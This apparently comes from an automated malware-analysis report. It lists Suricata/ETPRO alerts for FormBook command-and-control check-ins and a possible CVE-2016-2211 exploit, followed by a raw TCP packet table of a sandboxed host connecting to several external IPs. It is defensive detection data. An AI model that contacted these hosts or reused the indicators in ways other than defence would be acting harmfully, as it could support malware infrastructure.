2024-07-25T12:09:22.691671+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49737	80	192.168.2.5	91.195.240.19
2024-07-25T12:09:11.686976+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49734	80	192.168.2.5	23.251.54.212
2024-07-25T12:09:25.225242+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49738	80	192.168.2.5	91.195.240.19
2024-07-25T12:08:49.302083+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49733	80	192.168.2.5	23.251.54.212
2024-07-25T12:08:46.770826+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49732	80	192.168.2.5	23.251.54.212
2024-07-25T12:08:24.018743+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49726	80	192.168.2.5	91.195.240.19
2024-07-25T12:08:32.486164+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49728	80	192.168.2.5	67.223.117.189
2024-07-25T12:09:52.441240+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49745	80	192.168.2.5	67.198.129.29
2024-07-25T12:07:46.472374+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49721	80	192.168.2.5	217.76.156.252
2024-07-25T12:09:17.619583+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49735	80	192.168.2.5	91.195.240.19
2024-07-25T12:10:20.958027+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49751	80	192.168.2.5	91.195.240.19
2024-07-25T12:07:41.434812+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49719	80	192.168.2.5	217.76.156.252
2024-07-25T12:08:44.240324+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49731	80	192.168.2.5	23.251.54.212
2024-07-25T12:07:30.411485+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49716	80	192.168.2.5	89.31.143.90
2024-07-25T12:10:28.886427+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49754	80	192.168.2.5	91.195.240.19
2024-07-25T12:08:21.514425+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49725	80	192.168.2.5	91.195.240.19
2024-07-25T12:10:35.063527+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49755	80	192.168.2.5	104.21.25.75
2024-07-25T12:07:43.968352+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49720	80	192.168.2.5	217.76.156.252
2024-07-25T12:08:16.526647+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49723	80	192.168.2.5	91.195.240.19
2024-07-25T12:09:36.188464+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49741	80	192.168.2.5	66.96.162.141
2024-07-25T12:09:55.007150+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49746	80	192.168.2.5	67.198.129.29
2024-07-25T12:10:15.232066+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49750	80	192.168.2.5	3.33.130.190
2024-07-25T12:08:37.592119+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49730	80	192.168.2.5	67.223.117.189
2024-07-25T12:10:40.569386+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49757	80	192.168.2.5	104.21.25.75
2024-07-25T12:09:32.084340+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49739	80	192.168.2.5	66.96.162.141
2024-07-25T12:10:26.084850+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49753	80	192.168.2.5	91.195.240.19
2024-07-25T12:08:29.979171+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49727	80	192.168.2.5	67.223.117.189
2024-07-25T12:07:25.250658+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49713	80	192.168.2.5	89.31.143.90
2024-07-25T12:10:23.688421+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49752	80	192.168.2.5	91.195.240.19
2024-07-25T12:10:06.547993+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49749	80	192.168.2.5	3.33.130.190
2024-07-25T12:08:19.012550+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49724	80	192.168.2.5	91.195.240.19
2024-07-25T12:09:20.128346+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49736	80	192.168.2.5	91.195.240.19
2024-07-25T12:10:04.098923+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49748	80	192.168.2.5	3.33.130.190
2024-07-25T12:10:00.827604+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49747	80	192.168.2.5	3.33.130.190
2024-07-25T12:09:33.630376+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49740	80	192.168.2.5	66.96.162.141
2024-07-25T12:07:30.384981+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49715	52.165.165.26	192.168.2.5
2024-07-25T12:07:27.870797+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49714	80	192.168.2.5	89.31.143.90
2024-07-25T12:07:38.899660+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49718	80	192.168.2.5	217.76.156.252

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 12:07:08.880034924 CEST	49712	80	192.168.2.5	74.208.236.162
Jul 25, 2024 12:07:08.887279987 CEST	80	49712	74.208.236.162	192.168.2.5
Jul 25, 2024 12:07:08.887414932 CEST	49712	80	192.168.2.5	74.208.236.162
Jul 25, 2024 12:07:08.888206959 CEST	49712	80	192.168.2.5	74.208.236.162
Jul 25, 2024 12:07:08.894293070 CEST	80	49712	74.208.236.162	192.168.2.5
Jul 25, 2024 12:07:09.522630930 CEST	80	49712	74.208.236.162	192.168.2.5
Jul 25, 2024 12:07:09.523616076 CEST	80	49712	74.208.236.162	192.168.2.5
Jul 25, 2024 12:07:09.523761034 CEST	49712	80	192.168.2.5	74.208.236.162
Jul 25, 2024 12:07:09.524333954 CEST	49712	80	192.168.2.5	74.208.236.162
Jul 25, 2024 12:07:09.529455900 CEST	80	49712	74.208.236.162	192.168.2.5
Jul 25, 2024 12:07:24.587637901 CEST	49713	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:24.592691898 CEST	80	49713	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:24.592802048 CEST	49713	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:24.593045950 CEST	49713	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:24.598195076 CEST	80	49713	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:25.250333071 CEST	80	49713	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:25.250402927 CEST	80	49713	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:25.250658035 CEST	49713	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:26.099014997 CEST	49713	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:27.115011930 CEST	49714	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:27.190870047 CEST	80	49714	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:27.190968990 CEST	49714	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:27.191171885 CEST	49714	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:27.197289944 CEST	80	49714	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:27.870083094 CEST	80	49714	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:27.870722055 CEST	80	49714	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:27.870796919 CEST	49714	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:28.694124937 CEST	49714	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:29.708760023 CEST	49716	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:29.713783026 CEST	80	49716	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:29.713969946 CEST	49716	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:29.714313030 CEST	49716	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:29.719175100 CEST	80	49716	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:29.719456911 CEST	80	49716	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:30.411253929 CEST	80	49716	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:30.411412001 CEST	80	49716	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:30.411484957 CEST	49716	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:31.224106073 CEST	49716	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:32.240062952 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:32.358072996 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.358195066 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:32.358485937 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:32.363379955 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.997857094 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.998070955 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.998081923 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.998238087 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:32.998990059 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.999001980 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:32.999067068 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:33.000569105 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:33.000582933 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:33.000593901 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:33.000708103 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:33.000726938 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:33.000880957 CEST	49717	80	192.168.2.5	89.31.143.90
Jul 25, 2024 12:07:33.006649971 CEST	80	49717	89.31.143.90	192.168.2.5
Jul 25, 2024 12:07:38.197355986 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.204601049 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.204704046 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.204941988 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.209815025 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.898971081 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.899574995 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.899610996 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.899660110 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.900660038 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.900696039 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.900717020 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.902220011 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.902259111 CEST	80	49718	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:38.902282000 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:38.902314901 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:39.708369970 CEST	49718	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:40.724288940 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:40.730259895 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:40.730403900 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:40.730590105 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:40.735740900 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.434489012 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.434638023 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.434645891 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.434812069 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:41.436089039 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.436105967 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.436150074 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:41.437906027 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.437937021 CEST	80	49719	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:41.437962055 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:41.437990904 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:42.239696980 CEST	49719	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.255562067 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.262666941 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.266508102 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.266804934 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.271600962 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.271775007 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.967935085 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.968303919 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.968319893 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.968352079 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.969156027 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.969167948 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.969202995 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.970809937 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.970823050 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.970835924 CEST	80	49720	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:43.970853090 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:43.970880985 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:44.770966053 CEST	49720	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:45.787050962 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:45.795238972 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:45.795412064 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:45.795627117 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:45.801402092 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.471828938 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.472299099 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.472316980 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.472373962 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:46.473536015 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.473551989 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.473916054 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:46.476289988 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.476342916 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:07:46.476433992 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:46.476476908 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:46.476566076 CEST	49721	80	192.168.2.5	217.76.156.252
Jul 25, 2024 12:07:46.481426954 CEST	80	49721	217.76.156.252	192.168.2.5
Jul 25, 2024 12:08:15.766154051 CEST	49723	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:15.773804903 CEST	80	49723	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:15.773983955 CEST	49723	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:15.774245977 CEST	49723	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:15.780673981 CEST	80	49723	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:16.526175022 CEST	80	49723	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:16.526504040 CEST	80	49723	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:16.526647091 CEST	49723	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:17.286551952 CEST	49723	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:18.302659035 CEST	49724	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:18.307526112 CEST	80	49724	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:18.307670116 CEST	49724	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:18.307925940 CEST	49724	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:18.317667961 CEST	80	49724	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:19.008838892 CEST	80	49724	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:19.012492895 CEST	80	49724	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:19.012550116 CEST	49724	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:19.818475962 CEST	49724	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:20.834244013 CEST	49725	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:20.839210033 CEST	80	49725	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:20.839302063 CEST	49725	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:20.839744091 CEST	49725	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:20.844624043 CEST	80	49725	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:20.845011950 CEST	80	49725	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:21.514210939 CEST	80	49725	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:21.514363050 CEST	80	49725	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:21.514425039 CEST	49725	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:22.352299929 CEST	49725	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:23.364973068 CEST	49726	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:23.369982004 CEST	80	49726	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:23.370057106 CEST	49726	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:23.370387077 CEST	49726	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:23.375472069 CEST	80	49726	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:24.017417908 CEST	80	49726	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:24.018537045 CEST	80	49726	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:24.018743038 CEST	49726	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:24.018743038 CEST	49726	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:08:24.023849964 CEST	80	49726	91.195.240.19	192.168.2.5
Jul 25, 2024 12:08:29.349739075 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:29.356180906 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.356272936 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:29.356503963 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:29.363162041 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.978710890 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979003906 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979010105 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979017019 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979171038 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:29.979698896 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979705095 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979712009 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979717970 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979723930 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979729891 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.979861021 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:29.984424114 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.984515905 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.984522104 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:29.984642029 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.076672077 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.076682091 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.076689959 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.076724052 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.076807976 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.076807976 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.077645063 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.077692986 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.077831984 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.077881098 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.077888012 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.077959061 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.078289032 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078294992 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078301907 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078311920 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078423023 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.078716040 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078840017 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.078846931 CEST	80	49727	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:30.079054117 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:30.864588022 CEST	49727	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:31.880438089 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:31.890799999 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:31.891442060 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:31.891442060 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:31.899168968 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.485968113 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.485980988 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.485991001 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486164093 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.486217976 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486227036 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486243010 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486252069 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486258984 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486294985 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.486356020 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.486697912 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486705065 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.486845970 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.491271973 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.491297007 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.491579056 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.491636038 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.491729021 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.491729021 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.576618910 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.576836109 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.576843977 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.576862097 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.576915979 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.577033043 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577181101 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577189922 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577234983 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.577428102 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577436924 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577528000 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.577662945 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577725887 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.577728987 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577739000 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.577776909 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.577963114 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.578089952 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.578150988 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:32.578574896 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.578598022 CEST	80	49728	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:32.578660965 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:33.396091938 CEST	49728	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:34.440316916 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:34.447679043 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:34.447796106 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:34.448179007 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:34.455080986 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:34.455637932 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120264053 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120280027 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120291948 CEST	80	49729	67.223.117.189	192.168.2.5
